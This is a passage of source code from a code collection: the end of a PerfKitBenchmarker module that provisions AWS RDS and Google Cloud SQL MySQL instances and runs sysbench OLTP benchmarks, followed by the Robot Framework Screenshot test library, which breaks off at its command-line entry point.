metadata: The metadata to be passed along to the Samples class.
"""
all_tps = []
seen_general_statistics = False
seen_response_time = False
response_times = {}
sysbench_output_io = StringIO.StringIO(sysbench_output)
for line in sysbench_output_io.readlines():
if re.match('^\[', line):
tps = re.findall('tps: (.*?),', line)
all_tps.append(float(tps[0]))
continue
if line.startswith('General statistics:'):
seen_general_statistics = True
continue
if seen_general_statistics:
if re.match('^ +response time:.*', line):
seen_response_time = True
continue
if seen_general_statistics and seen_response_time:
for token in RESPONSE_TIME_TOKENS:
search_string = '.*%s: +(.*)ms' % token
if re.findall(search_string, line):
response_times[token] = float(re.findall(search_string, line)[0])
tps_line = ', '.join(map(str, all_tps))
# Print all tps data points in the log for reference. And report
# percentiles of these tps data in the final result set.
logging.info('All TPS numbers: \n %s', tps_line)
tps_percentile = sample.PercentileCalculator(all_tps)
for percentile in sample.PERCENTILES_LIST:
percentile_string = 'p%s' % str(percentile)
logging.info('%s tps %f', percentile_string,
tps_percentile[percentile_string])
metric_name = ('%s %s') % (SYSBENCH_RESULT_NAME_TPS, percentile_string)
results.append(sample.Sample(
metric_name,
tps_percentile[percentile_string],
NA_UNIT,
metadata))
# Also report average, stddev, and coefficient of variation
for token in ['average', 'stddev']:
logging.info('tps %s %f', token, tps_percentile[token])
metric_name = ('%s %s') % (SYSBENCH_RESULT_NAME_TPS, token)
results.append(sample.Sample(
metric_name,
tps_percentile[token],
NA_UNIT,
metadata))
if tps_percentile['average'] > 0:
cv = tps_percentile['stddev'] / tps_percentile['average']
logging.info('tps coefficient of variation %f', cv)
metric_name = ('%s %s') % (SYSBENCH_RESULT_NAME_TPS, 'cv')
results.append(sample.Sample(
metric_name,
cv,
NA_UNIT,
metadata))
# Now, report the latency numbers.
for token in RESPONSE_TIME_TOKENS:
logging.info('%s_response_time is %f', token, response_times[token])
metric_name = '%s %s' % (SYSBENCH_RESULT_NAME_LATENCY, token)
if token == 'percentile':
metric_name = '%s %s' % (metric_name, FLAGS.sysbench_latency_percentile)
results.append(sample.Sample(
metric_name,
response_times[token],
MS_UNIT,
metadata))
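# A minimal, self-contained sketch of the per-interval tps extraction performed
# above, using a line adapted from the example output in the docstring
# (illustrative values only):
#
#   import re
#   line = ('[ 2s] threads: 16, tps: 526.38, reads: 7446.79, writes: 2105.52, '
#           'response time: 210.67ms (99%), errors: 0.00, reconnects: 0.00')
#   if re.match(r'^\[', line):
#       tps = float(re.findall(r'tps: (.*?),', line)[0])  # -> 526.38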
def _GetSysbenchCommandPrefix():
""" Decides what the prefix is for sysbench command based on os type.
Args:
None.
Returns:
A string representing the sysbench command prefix.
"""
if FLAGS.os_type == 'rhel':
return vm_util.VM_TMP_DIR
else:
return NORMAL_SYSBENCH_PATH_PREFIX
def _IssueSysbenchCommand(vm, duration):
""" Issues a sysbench run command given a vm and a duration.
Does nothing if duration is <= 0
Args:
vm: The test VM to issue command to.
duration: the duration of the sysbench run.
Returns:
stdout, stderr: the result of the command.
"""
stdout = ''
stderr = ''
oltp_script_path = '%s%s' % (_GetSysbenchCommandPrefix(), OLTP_SCRIPT_PATH)
if duration > 0:
run_cmd_tokens = ['sysbench',
'--test=%s' % oltp_script_path,
'--mysql_svc_oltp_tables_count=%d' %
FLAGS.mysql_svc_oltp_tables_count,
'--oltp-table-size=%d' %
FLAGS.mysql_svc_oltp_table_size,
'--rand-init=%s' % RAND_INIT_ON,
'--db-ps-mode=%s' % DISABLE,
'--oltp-dist-type=%s' % UNIFORM,
'--oltp-read-only=%s' % OFF,
'--num-threads=%d' % FLAGS.sysbench_thread_count,
'--percentile=%d' % FLAGS.sysbench_latency_percentile,
'--report-interval=%d' %
FLAGS.sysbench_report_interval,
'--max-requests=0',
'--max-time=%d' % duration,
'--mysql-user=%s' % vm.db_instance_master_user,
'--mysql-password="%s"' %
vm.db_instance_master_password,
'--mysql-host=%s' % vm.db_instance_address,
'run']
run_cmd = ' '.join(run_cmd_tokens)
stdout, stderr = vm.RobustRemoteCommand(run_cmd)
logging.info('Sysbench results: \n stdout is:\n%s\nstderr is\n%s',
stdout, stderr)
return stdout, stderr
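# With the default flags (and a non-rhel client, so the /usr prefix) the command
# assembled above looks roughly like the sketch below; user, password and host
# are filled in from the vm object at run time:
#
#   sysbench --test=/usr/share/doc/sysbench/tests/db/oltp.lua \
#       --mysql_svc_oltp_tables_count=4 --oltp-table-size=100000 \
#       --rand-init=on --db-ps-mode=disable --oltp-dist-type=uniform \
#       --oltp-read-only=off --num-threads=16 --percentile=99 \
#       --report-interval=2 --max-requests=0 --max-time=480 \
#       --mysql-user=<user> --mysql-password="<password>" --mysql-host=<host> run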
def _RunSysbench(vm, metadata):
""" Runs the Sysbench OLTP test.
The test is run on the DB instance as indicated by the vm.db_instance_address.
Args:
vm: The client VM that will issue the sysbench test.
metadata: The PKB metadata to be passed along to the final results.
Returns:
Results: A list of results of this run.
"""
results = []
if not hasattr(vm, 'db_instance_address'):
logging.error(
'Prepare has likely failed, db_instance_address is not found.')
raise DBStatusQueryError('RunSysbench: DB instance address not found.')
# Create the sbtest database for Sysbench.
# str(uuid.uuid4())[-8:]
create_sbtest_db_cmd = ('mysql -h %s -u %s -p%s '
'-e \'create database sbtest;\'') % (
vm.db_instance_address,
vm.db_instance_master_user,
vm.db_instance_master_password)
stdout, stderr = vm.RemoteCommand(create_sbtest_db_cmd)
logging.info('sbtest db created, stdout is %s, stderr is %s',
stdout, stderr)
# Provision the Sysbench test based on the input flags (load data into DB)
# Could take a long time if the data to be loaded is large.
data_load_start_time = time.time()
prepare_script_path = '%s%s' % (_GetSysbenchCommandPrefix(),
PREPARE_SCRIPT_PATH)
data_load_cmd_tokens = ['sysbench',
'--test=%s' % prepare_script_path,
'--mysql_svc_oltp_tables_count=%d' %
FLAGS.mysql_svc_oltp_tables_count,
'--oltp-table-size=%d' %
FLAGS.mysql_svc_oltp_table_size,
'--rand-init=%s' % RAND_INIT_ON,
'--num-threads=%d' %
FLAGS.mysql_svc_oltp_tables_count,
'--mysql-user=%s' % vm.db_instance_master_user,
'--mysql-password="%s"' %
vm.db_instance_master_password,
'--mysql-host=%s' % vm.db_instance_address,
'run']
data_load_cmd = ' '.join(data_load_cmd_tokens)
# Sysbench output is in stdout, but we also get stderr just in case
# something went wrong.
stdout, stderr = vm.RobustRemoteCommand(data_load_cmd)
load_duration = time.time() - data_load_start_time
logging.info('It took %d seconds to finish the data loading step',
load_duration)
logging.info('data loading results: \n stdout is:\n%s\nstderr is\n%s',
stdout, stderr)
results.append(sample.Sample(
SYSBENCH_RESULT_NAME_DATA_LOAD,
load_duration,
SECONDS_UNIT,
metadata))
# Now run the sysbench OLTP test and parse the results.
for phase in ['warm-up', 'run']:
# First step is to run the test long enough to cover the warmup period
# as requested by the caller. Then we do the "real" run, parse and report
# the results.
duration = 0
if phase == 'warm-up' and FLAGS.sysbench_warmup_seconds > 0:
duration = FLAGS.sysbench_warmup_seconds
logging.info('Sysbench warm-up run, duration is %d', duration)
elif phase == 'run':
duration = FLAGS.sysbench_run_seconds
logging.info('Sysbench real run, duration is %d', duration)
stdout, stderr = _IssueSysbenchCommand(vm, duration)
if phase == 'run':
# We only need to parse the results for the "real" run.
logging.info('\n Parsing Sysbench Results...\n')
ParseSysbenchOutput(stdout, results, metadata)
return results
def _RDSParseDBInstanceStatus(json_response):
"""Parses a JSON response from an RDS DB status query command.
Args:
json_response: The response from the DB status query command in JSON.
Returns:
A list of sample.Sample objects.
"""
status = ''
  # Sometimes you look for 'DBInstance', and sometimes you need to look for
  # 'DBInstances' and then take the first element.
if 'DBInstance' in json_response:
status = json_response['DBInstance']['DBInstanceStatus']
else:
if 'DBInstances' in json_response:
status = json_response['DBInstances'][0]['DBInstanceStatus']
return status
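# For reference, the two response shapes handled above look roughly like
# (field values are illustrative, not taken from a real RDS response):
#   {"DBInstance":  {"DBInstanceStatus": "creating", ...}}
#   {"DBInstances": [{"DBInstanceStatus": "available", ...}]}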
class RDSMySQLBenchmark(object):
"""MySQL benchmark based on the RDS service on AWS."""
def Prepare(self, vm):
"""Prepares the DB and everything for the AWS-RDS provider.
Args:
vm: The VM to be used as the test client.
"""
logging.info('Preparing MySQL Service benchmarks for RDS.')
# TODO: Refactor the RDS DB instance creation and deletion logic out
# to a new class called RDSDBInstance that Inherits from
# perfkitbenchmarker.resource.BaseResource.
# And do the same for GCP.
    # The first step is to create another subnet in the same VPC as the VM, but in a
# different zone. RDS requires two subnets in two different zones to create
# a DB instance, EVEN IF you do not specify multi-AZ in your DB creation
# request.
# Get a list of zones and pick one that's different from the zone VM is in.
new_subnet_zone = None
get_zones_cmd = util.AWS_PREFIX + ['ec2', 'describe-availability-zones']
stdout, _, _ = vm_util.IssueCommand(get_zones_cmd)
response = json.loads(stdout)
all_zones = response['AvailabilityZones']
for zone in all_zones:
if zone['ZoneName'] != vm.zone:
new_subnet_zone = zone['ZoneName']
break
if new_subnet_zone is None:
raise DBStatusQueryError('Cannot find a zone to create the required '
'second subnet for the DB instance.')
# Now create a new subnet in the zone that's different from where the VM is
logging.info('Creating a second subnet in zone %s', new_subnet_zone)
new_subnet = aws_network.AwsSubnet(new_subnet_zone, vm.network.vpc.id,
'10.0.1.0/24')
new_subnet.Create()
logging.info('Successfully created a new subnet, subnet id is: %s',
new_subnet.id)
# Remember this so we can cleanup properly.
vm.extra_subnet_for_db = new_subnet
# Now we can create a new DB subnet group that has two subnets in it.
db_subnet_group_name = 'pkb%s' % FLAGS.run_uri
create_db_subnet_group_cmd = util.AWS_PREFIX + [
'rds',
'create-db-subnet-group',
'--db-subnet-group-name', db_subnet_group_name,
'--db-subnet-group-description', 'pkb_subnet_group_for_db',
'--subnet-ids', vm.network.subnet.id, new_subnet.id]
stdout, stderr, _ = vm_util.IssueCommand(create_db_subnet_group_cmd)
logging.info('Created a DB subnet group, stdout is:\n%s\nstderr is:\n%s',
stdout, stderr)
vm.db_subnet_group_name = db_subnet_group_name
# open up tcp port 3306 in the VPC's security group, we need that to connect
# to the DB.
open_port_cmd = util.AWS_PREFIX + [
'ec2',
'authorize-security-group-ingress',
'--group-id', vm.group_id,
'--source-group', vm.group_id,
'--protocol', 'tcp',
'--port', MYSQL_PORT]
stdout, stderr, _ = vm_util.IssueCommand(open_port_cmd)
logging.info('Granted DB port ingress, stdout is:\n%s\nstderr is:\n%s',
stdout, stderr)
# Finally, it's time to create the DB instance!
vm.db_instance_id = 'pkb-DB-%s' % FLAGS.run_uri
db_class = \
RDS_CORE_TO_DB_CLASS_MAP['%s' % FLAGS.mysql_svc_db_instance_cores]
vm.db_instance_master_user = MYSQL_ROOT_USER
vm.db_instance_master_password = _GenerateRandomPassword()
create_db_cmd = util.AWS_PREFIX + [
'rds',
'create-db-instance',
'--db-instance-identifier', vm.db_instance_id,
'--db-instance-class', db_class,
'--engine', RDS_DB_ENGINE,
'--engine-version', RDS_DB_ENGINE_VERSION,
'--storage-type', RDS_DB_STORAGE_TYPE_GP2,
'--allocated-storage', RDS_DB_STORAGE_GP2_SIZE,
'--vpc-security-group-ids', vm.group_id,
'--master-username', vm.db_instance_master_user,
'--master-user-password', vm.db_instance_master_password,
'--availability-zone', vm.zone,
'--db-subnet-group-name', vm.db_subnet_group_name]
status_query_cmd = util.AWS_PREFIX + [
'rds',
'describe-db-instances',
'--db-instance-id', vm.db_instance_id]
stdout, stderr, _ = vm_util.IssueCommand(create_db_cmd)
logging.info('Request to create the DB has been issued, stdout:\n%s\n'
'stderr:%s\n', stdout, stderr)
response = json.loads(stdout)
db_creation_status = _RDSParseDBInstanceStatus(response)
for status_query_count in xrange(1, DB_STATUS_QUERY_LIMIT + 1):
if db_creation_status == 'available':
break
if db_creation_status not in RDS_DB_CREATION_PENDING_STATUS:
raise DBStatusQueryError('Invalid status in DB creation response. '
' stdout is\n%s, stderr is\n%s' % (
stdout, stderr))
logging.info('Querying db creation status, current state is %s, query '
'count is %d', db_creation_status, status_query_count)
time.sleep(DB_STATUS_QUERY_INTERVAL)
stdout, stderr, _ = vm_util.IssueCommand(status_query_cmd)
response = json.loads(stdout)
db_creation_status = _RDSParseDBInstanceStatus(response)
else:
raise DBStatusQueryError('DB creation timed-out, we have '
'waited at least %s * %s seconds.' % (
DB_STATUS_QUERY_INTERVAL,
DB_STATUS_QUERY_LIMIT))
    # We are good now, the DB has been created. Now get the endpoint address.
    # On RDS, you always connect with a DNS name; if you do that from an EC2 VM,
    # that DNS name will be resolved to an internal IP address of the DB.
if 'DBInstance' in response:
vm.db_instance_address = response['DBInstance']['Endpoint']['Address']
else:
if 'DBInstances' in response:
vm.db_instance_address = \
response['DBInstances'][0]['Endpoint']['Address']
logging.info('Successfully created an RDS DB instance. Address is %s',
vm.db_instance_address)
logging.info('Complete output is:\n %s', response)
def Cleanup(self, vm):
"""Clean up RDS instances, cleanup the extra subnet created for the
creation of the RDS instance.
Args:
vm: The VM that was used as the test client, which also stores states
for clean-up.
"""
# Now, we can delete the DB instance. vm.db_instance_id is the id to call.
# We need to keep querying the status of the deletion here before we let
# this go. RDS DB deletion takes some time to finish. And we have to
# wait until this DB is deleted before we proceed because this DB holds
# references to various other resources: subnet groups, subnets, vpc, etc.
delete_db_cmd = util.AWS_PREFIX + [
'rds',
'delete-db-instance',
'--db-instance-identifier', vm.db_instance_id,
'--skip-final-snapshot']
logging.info('Deleting db instance %s...', vm.db_instance_id)
    # Note: the status of this deletion command is validated in the loop below;
    # both stdout and stderr are checked.
stdout, stderr, _ = vm_util.IssueCommand(delete_db_cmd)
logging.info('Request to delete the DB has been issued, stdout:\n%s\n'
'stderr:%s\n', stdout, stderr)
status_query_cmd = util.AWS_PREFIX + [
'rds',
'describe-db-instances',
'--db-instance-id', vm.db_instance_id]
db_status = None
for status_query_count in xrange(1, DB_STATUS_QUERY_LIMIT + 1):
try:
response = json.loads(stdout)
db_status = _RDSParseDBInstanceStatus(response)
if db_status == 'deleting':
logging.info('DB is still in the deleting state, status_query_count '
'is %d', status_query_count)
# Wait for a few seconds and query status
time.sleep(DB_STATUS_QUERY_INTERVAL)
stdout, stderr, _ = vm_util.IssueCommand(status_query_cmd)
else:
logging.info('DB deletion status is no longer in deleting, it is %s',
db_status)
break
except:
# stdout cannot be parsed into json, it might simply be empty because
# deletion has been completed.
break
else:
logging.warn('DB is still in deleting state after long wait, bail.')
db_instance_deletion_failed = False
if db_status == 'deleted' or re.findall('DBInstanceNotFound', stderr):
      # Sometimes we get a 'deleted' status from the DB status query command,
      # but more often the DB status query command fails with a "not found"
      # error; both are positive confirmation that the DB has been deleted.
logging.info('DB has been successfully deleted, got confirmation.')
else:
      # We did not get positive confirmation that the DB was deleted even after a
      # long wait, so we have to bail. But we will log an error message, and
      # then raise an exception at the end of this function so this particular
      # run shows up as a failed run to the user, allowing them to examine
      # the logs.
db_instance_deletion_failed = True
logging.error(
'RDS DB instance %s failed to be deleted, we did not get '
'final confirmation from stderr, which is:\n %s', vm.db_instance_id,
stderr)
if hasattr(vm, 'db_subnet_group_name'):
delete_db_subnet_group_cmd = util.AWS_PREFIX + [
'rds',
'delete-db-subnet-group',
'--db-subnet-group-name', vm.db_subnet_group_name]
stdout, stderr, _ = vm_util.IssueCommand(delete_db_subnet_group_cmd)
logging.info('Deleted the db subnet group. stdout is:\n%s, stderr: \n%s',
stdout, stderr)
if hasattr(vm, 'extra_subnet_for_db'):
vm.extra_subnet_for_db.Delete()
if db_instance_deletion_failed:
raise DBStatusQueryError('Failed to get confirmation of DB instance '
'deletion! Check the log for details!')
class GoogleCloudSQLBenchmark(object):
"""MySQL benchmark based on the Google Cloud SQL service."""
def Prepare(self, vm):
"""Prepares the DB and everything for the provider GCP (Cloud SQL)
Args:
vm: The VM to be used as the test client
"""
# TODO: Refactor the GCP Cloud SQL instance creation and deletion logic out
# to a new class called GCPCloudSQLInstance that Inherits from
# perfkitbenchmarker.resource.BaseResource.
logging.info('Preparing MySQL Service benchmarks for Google Cloud SQL.')
vm.db_instance_name = 'pkb%s' % FLAGS.run_uri
db_tier = 'db-n1-standard-%s' % FLAGS.mysql_svc_db_instance_cores
# Currently, we create DB instance in the same zone as the test VM.
db_instance_zone = vm.zone
# Currently GCP REQUIRES you to connect to the DB instance via external IP
# (i.e., using external IPs of the DB instance AND the VM instance).
authorized_network = '%s/32' % vm.ip_address
create_db_cmd = [FLAGS.gcloud_path,
'sql',
'instances',
'create', vm.db_instance_name,
'--quiet',
'--format=json',
'--async',
'--activation-policy=ALWAYS',
'--assign-ip',
'--authorized-networks=%s' % authorized_network,
'--backup-start-time=%s' % DEFAULT_BACKUP_START_TIME,
'--enable-bin-log',
'--tier=%s' % db_tier,
'--gce-zone=%s' % db_instance_zone,
'--database-version=%s' % GCP_MY_SQL_VERSION,
'--pricing-plan=%s' % GCP_PRICING_PLAN]
stdout, _, _ = vm_util.IssueCommand(create_db_cmd)
response = json.loads(stdout)
if response['operation'] is None or response['operationType'] != 'CREATE':
raise DBStatusQueryError('Invalid operation or unrecognized '
'operationType in DB creation response. '
' stdout is %s' % stdout)
status_query_cmd = [FLAGS.gcloud_path,
'sql',
'instances',
'describe', vm.db_instance_name,
'--format', 'json']
stdout, _, _ = vm_util.IssueCommand(status_query_cmd)
response = json.loads(stdout)
query_count = 1
while True:
state = response['state']
if state is None:
raise ValueError('Cannot parse response from status query command. '
'The state is missing. stdout is %s' % stdout)
if state == 'RUNNABLE':
break
else:
if query_count > DB_STATUS_QUERY_LIMIT:
raise DBStatusQueryError('DB creation timed-out, we have '
'waited at least %s * %s seconds.' % (
DB_STATUS_QUERY_INTERVAL,
DB_STATUS_QUERY_LIMIT))
logging.info('Querying db creation status, current state is %s, query '
'count is %d', state, query_count)
time.sleep(DB_STATUS_QUERY_INTERVAL)
stdout, _, _ = vm_util.IssueCommand(status_query_cmd)
response = json.loads(stdout)
query_count += 1
logging.info('Successfully created the DB instance. Complete response is '
'%s', response)
vm.db_instance_address = response['ipAddresses'][0]['ipAddress']
logging.info('DB IP address is: %s', vm.db_instance_address)
# Set the root password to a common one that can be referred to in common
# code across providers.
vm.db_instance_master_user = MYSQL_ROOT_USER
vm.db_instance_master_password = _GenerateRandomPassword()
set_password_cmd = [FLAGS.gcloud_path,
'sql',
'instances',
'set-root-password',
vm.db_instance_name,
'--password', vm.db_instance_master_password]
stdout, stderr, _ = vm_util.IssueCommand(set_password_cmd)
logging.info('Set root password completed. Stdout:\n%s\nStderr:\n%s',
stdout, stderr)
def Cleanup(self, vm):
if hasattr(vm, 'db_instance_name'):
delete_db_cmd = [FLAGS.gcloud_path,
'sql',
'instances',
'delete', vm.db_instance_name,
'--quiet']
stdout, stderr, status = vm_util.IssueCommand(delete_db_cmd)
logging.info('DB cleanup command issued, stdout is %s, stderr is %s '
'status is %s', stdout, stderr, status)
else:
logging.info('db_instance_name does not exist, no need to cleanup.')
MYSQL_SERVICE_BENCHMARK_DICTIONARY = {
benchmark_spec_class.GCP: GoogleCloudSQLBenchmark(),
benchmark_spec_class.AWS: RDSMySQLBenchmark()}
def Prepare(benchmark_spec):
"""Prepare the MySQL DB Instances, configures it.
Prepare the client test VM, installs SysBench, configures it.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
"""
  # We would like to always clean up server-side state.
  # If we don't set this, our cleanup function will only be called when the VM
  # is a static VM, but we have server-side state to clean up regardless of the
  # VM type.
benchmark_spec.always_call_cleanup = True
vms = benchmark_spec.vms
# Setup common test tools required on the client VM
vms[0].Install('sysbench05plus')
# Prepare service specific states (create DB instance, configure it, etc)
MYSQL_SERVICE_BENCHMARK_DICTIONARY[FLAGS.cloud].Prepare(vms[0])
def Run(benchmark_spec):
"""Run the MySQL Service benchmark and publish results.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
Returns:
Results.
"""
logging.info('Start benchmarking MySQL Service, '
'Cloud Provider is %s.', FLAGS.cloud)
vms = benchmark_spec.vms
metadata = {
'mysql_svc_oltp_tables_count': FLAGS.mysql_svc_oltp_tables_count,
'mysql_svc_oltp_table_size': FLAGS.mysql_svc_oltp_table_size,
'mysql_svc_db_instance_cores': FLAGS.mysql_svc_db_instance_cores,
'sysbench_warm_up_seconds': FLAGS.sysbench_warmup_seconds,
'sysbench_run_seconds': FLAGS.sysbench_run_seconds,
'sysbench_thread_count': FLAGS.sysbench_thread_count,
'sysbench_latency_percentile': FLAGS.sysbench_latency_percentile,
'sysbench_report_interval': FLAGS.sysbench_report_interval
}
# The run phase is common across providers. The VMs[0] object contains all
# information and states necessary to carry out the run.
results = _RunSysbench(vms[0], metadata)
print results
return results
def Cleanup(benchmark_spec):
"""Clean up MySQL Service benchmark related states on server and client.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
"""
vms = benchmark_spec.vms
MYSQL_SERVICE_BENCHMARK_DICTIONARY[FLAGS.cloud].Cleanup(vms[0])
| mateusz-blaszkowski/PerfKitBenchmarker | perfkitbenchmarker/linux_benchmarks/mysql_service_benchmark.py | Python | apache-2.0 | 33,031 | 0.004874 |
# Copyright 2008-2014 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
if sys.platform.startswith('java'):
from java.awt import Toolkit, Robot, Rectangle
from javax.imageio import ImageIO
from java.io import File
elif sys.platform == 'cli':
import clr
clr.AddReference('System.Windows.Forms')
clr.AddReference('System.Drawing')
from System.Drawing import Bitmap, Graphics, Imaging
from System.Windows.Forms import Screen
else:
try:
import wx
except ImportError:
wx = None
try:
from gtk import gdk
except ImportError:
gdk = None
try:
from PIL import ImageGrab # apparently available only on Windows
except ImportError:
ImageGrab = None
from robot import utils
from robot.api import logger
from robot.libraries.BuiltIn import BuiltIn
from robot.version import get_version
class Screenshot(object):
"""Test library for taking screenshots on the machine where tests are run.
Notice that successfully taking screenshots requires tests to be run with
a physical or virtual display.
This library was heavily enhanced in Robot Framework 2.5.5 release. Old
keywords for taking screenshots were deprecated and they have since been
removed.
= Using with Python =
With Python you need to have one of the following modules installed to be
able to use this library. The first module that is found will be used.
- wxPython :: http://wxpython.org :: Required also by RIDE so many Robot
Framework users already have this module installed.
- PyGTK :: http://pygtk.org :: This module is available by default on most
Linux distributions.
- Python Imaging Library (PIL) :: http://www.pythonware.com/products/pil ::
This module can take screenshots only on Windows.
= Using with Jython and IronPython =
With Jython and IronPython this library uses APIs provided by JVM and .NET
platforms, respectively. These APIs are always available and thus no
external modules are needed.
IronPython support was added in Robot Framework 2.7.5.
= Where screenshots are saved =
By default screenshots are saved into the same directory where the Robot
Framework log file is written. If no log is created, screenshots are saved
into the directory where the XML output file is written.
It is possible to specify a custom location for screenshots using
`screenshot_directory` argument in `importing` and `Set Screenshot Directory`
keyword during execution. It is also possible to save screenshots using
an absolute path.
"""
ROBOT_LIBRARY_SCOPE = 'TEST SUITE'
ROBOT_LIBRARY_VERSION = get_version()
def __init__(self, screenshot_directory=None):
"""Configure where screenshots are saved.
If `screenshot_directory` is not given, screenshots are saved into
same directory as the log file. The directory can also be set using
`Set Screenshot Directory` keyword.
Examples (use only one of these):
| =Setting= | =Value= | =Value= | =Value= |
| Library | Screenshot | | # Default location |
| Library | Screenshot | ${TEMPDIR} | # System temp |
"""
self._given_screenshot_dir = self._norm_path(screenshot_directory)
self._screenshot_taker = ScreenshotTaker()
def _norm_path(self, path):
if not path:
return path
return os.path.normpath(path.replace('/', os.sep))
@property
def _screenshot_dir(self):
return self._given_screenshot_dir or self._log_dir
@property
def _log_dir(self):
variables = BuiltIn().get_variables()
outdir = variables['${OUTPUTDIR}']
log = variables['${LOGFILE}']
log = os.path.dirname(log) if log != 'NONE' else '.'
return self._norm_path(os.path.join(outdir, log))
def set_screenshot_directory(self, path):
"""Sets the directory where screenshots are saved.
It is possible to use `/` as a path separator in all operating systems.
Path to the old directory is returned.
The directory can also be set in `importing`.
"""
path = self._norm_path(path)
if not os.path.isdir(path):
raise RuntimeError("Directory '%s' does not exist." % path)
old = self._screenshot_dir
self._given_screenshot_dir = path
return old
def take_screenshot(self, name="screenshot", width="800px"):
"""Takes a screenshot in JPEG format and embeds it into the log file.
Name of the file where the screenshot is stored is derived from the
given `name`. If the `name` ends with extension `.jpg` or `.jpeg`,
the screenshot will be stored with that exact name. Otherwise a unique
name is created by adding an underscore, a running index and
an extension to the `name`.
The name will be interpreted to be relative to the directory where
the log file is written. It is also possible to use absolute paths.
Using `/` as a path separator works in all operating systems.
`width` specifies the size of the screenshot in the log file.
Examples: (LOGDIR is determined automatically by the library)
| Take Screenshot | | | # LOGDIR/screenshot_1.jpg (index automatically incremented) |
| Take Screenshot | mypic | | # LOGDIR/mypic_1.jpg (index automatically incremented) |
| Take Screenshot | ${TEMPDIR}/mypic | | # /tmp/mypic_1.jpg (index automatically incremented) |
| Take Screenshot | pic.jpg | | # LOGDIR/pic.jpg (always uses this file) |
| Take Screenshot | images/login.jpg | 80% | # Specify both name and width. |
| Take Screenshot | width=550px | | # Specify only width. |
The path where the screenshot is saved is returned.
"""
path = self._save_screenshot(name)
self._embed_screenshot(path, width)
return path
def take_screenshot_without_embedding(self, name="screenshot"):
"""Takes a screenshot and links it from the log file.
This keyword is otherwise identical to `Take Screenshot` but the saved
screenshot is not embedded into the log file. The screenshot is linked
so it is nevertheless easily available.
"""
path = self._save_screenshot(name)
self._link_screenshot(path)
return path
def _save_screenshot(self, basename, directory=None):
path = self._get_screenshot_path(basename, directory)
return self._screenshot_to_file(path)
def _screenshot_to_file(self, path):
path = self._validate_screenshot_path(path)
logger.debug('Using %s modules for taking screenshot.'
% self._screenshot_taker.module)
try:
self._screenshot_taker(path)
except:
logger.warn('Taking screenshot failed: %s\n'
'Make sure tests are run with a physical or virtual display.'
% utils.get_error_message())
return path
def _validate_screenshot_path(self, path):
path = utils.abspath(self._norm_path(path))
if not os.path.exists(os.path.dirname(path)):
raise RuntimeError("Directory '%s' where to save the screenshot "
"does not exist" % os.path.dirname(path))
return path
def _get_screenshot_path(self, basename, directory):
directory = self._norm_path(directory) if directory else self._screenshot_dir
if basename.lower().endswith(('.jpg', '.jpeg')):
return os.path.join(directory, basename)
index = 0
while True:
index += 1
path = os.path.join(directory, "%s_%d.jpg" % (basename, index))
if not os.path.exists(path):
return path
def _embed_screenshot(self, path, width):
link = utils.get_link_path(path, self._log_dir)
logger.info('<a href="%s"><img src="%s" width="%s"></a>'
% (link, link, width), html=True)
def _link_screenshot(self, path):
link = utils.get_link_path(path, self._log_dir)
logger.info("Screenshot saved to '<a href=\"%s\">%s</a>'."
% (link, path), html=True)
class ScreenshotTaker(object):
def __init__(self, module_name=None):
self._screenshot = self._get_screenshot_taker(module_name)
self.module = self._screenshot.__name__.split('_')[1]
self._wx_app_reference = None
def __call__(self, path):
self._screenshot(path)
def __nonzero__(self):
return self.module != 'no'
def test(self, path=None):
print "Using '%s' module." % self.module
if not self:
return False
if not path:
print "Not taking test screenshot."
return True
print "Taking test screenshot to '%s'." % path
try:
self(path)
except:
print "Failed: %s" % utils.get_error_message()
return False
else:
print "Success!"
return True
def _get_screenshot_taker(self, module_name):
if sys.platform.startswith('java'):
return self._java_screenshot
if sys.platform == 'cli':
return self._cli_screenshot
if module_name:
method_name = '_%s_screenshot' % module_name.lower()
if hasattr(self, method_name):
return getattr(self, method_name)
return self._get_default_screenshot_taker()
def _get_default_screenshot_taker(self):
for module, screenshot_taker in [(wx, self._wx_screenshot),
(gdk, self._gtk_screenshot),
(ImageGrab, self._pil_screenshot),
(True, self._no_screenshot)]:
if module:
return screenshot_taker
def _java_screenshot(self, path):
size = Toolkit.getDefaultToolkit().getScreenSize()
rectangle = Rectangle(0, 0, size.width, size.height)
image = Robot().createScreenCapture(rectangle)
ImageIO.write(image, 'jpg', File(path))
def _cli_screenshot(self, path):
bmp = Bitmap(Screen.PrimaryScreen.Bounds.Width,
Screen.PrimaryScreen.Bounds.Height)
graphics = Graphics.FromImage(bmp)
try:
graphics.CopyFromScreen(0, 0, 0, 0, bmp.Size)
finally:
graphics.Dispose()
bmp.Save(path, Imaging.ImageFormat.Jpeg)
def _wx_screenshot(self, path):
if not self._wx_app_reference:
self._wx_app_reference = wx.PySimpleApp()
context = wx.ScreenDC()
width, height = context.GetSize()
bitmap = wx.EmptyBitmap(width, height, -1)
memory = wx.MemoryDC()
memory.SelectObject(bitmap)
memory.Blit(0, 0, width, height, context, -1, -1)
memory.SelectObject(wx.NullBitmap)
bitmap.SaveFile(path, wx.BITMAP_TYPE_JPEG)
def _gtk_screenshot(self, path):
window = gdk.get_default_root_window()
if not window:
raise RuntimeError('Taking screenshot failed')
width, height = window.get_size()
pb = gdk.Pixbuf(gdk.COLORSPACE_RGB, False, 8, width, height)
pb = pb.get_from_drawable(window, window.get_colormap(),
0, 0, 0, 0, width, height)
if not pb:
raise RuntimeError('Taking screenshot failed')
pb.save(path, 'jpeg')
def _pil_screenshot(self, path):
ImageGrab.grab().save(path, 'JPEG')
def _no_screenshot(self, path):
raise RuntimeError('Taking screenshots is not supported on this platform '
'by default. See library documentation for details.')
if __name__ == "__main__":
if len(sys.argv) not in [2, 3]:
sys.exit("Usage: %s <path> [wx|gtk|pil] OR test [<path>]" % os.path.basename(sys.argv[0]))
if sys.argv[1] == 'test':
sys.exit(0 if ScreenshotTaker().test(*sys.argv[2:]) else 1)
path = utils.abspath(sys.argv[1])
module = sys.argv[2] if len(sys.argv) == 3 else None
shooter = ScreenshotTaker(module)
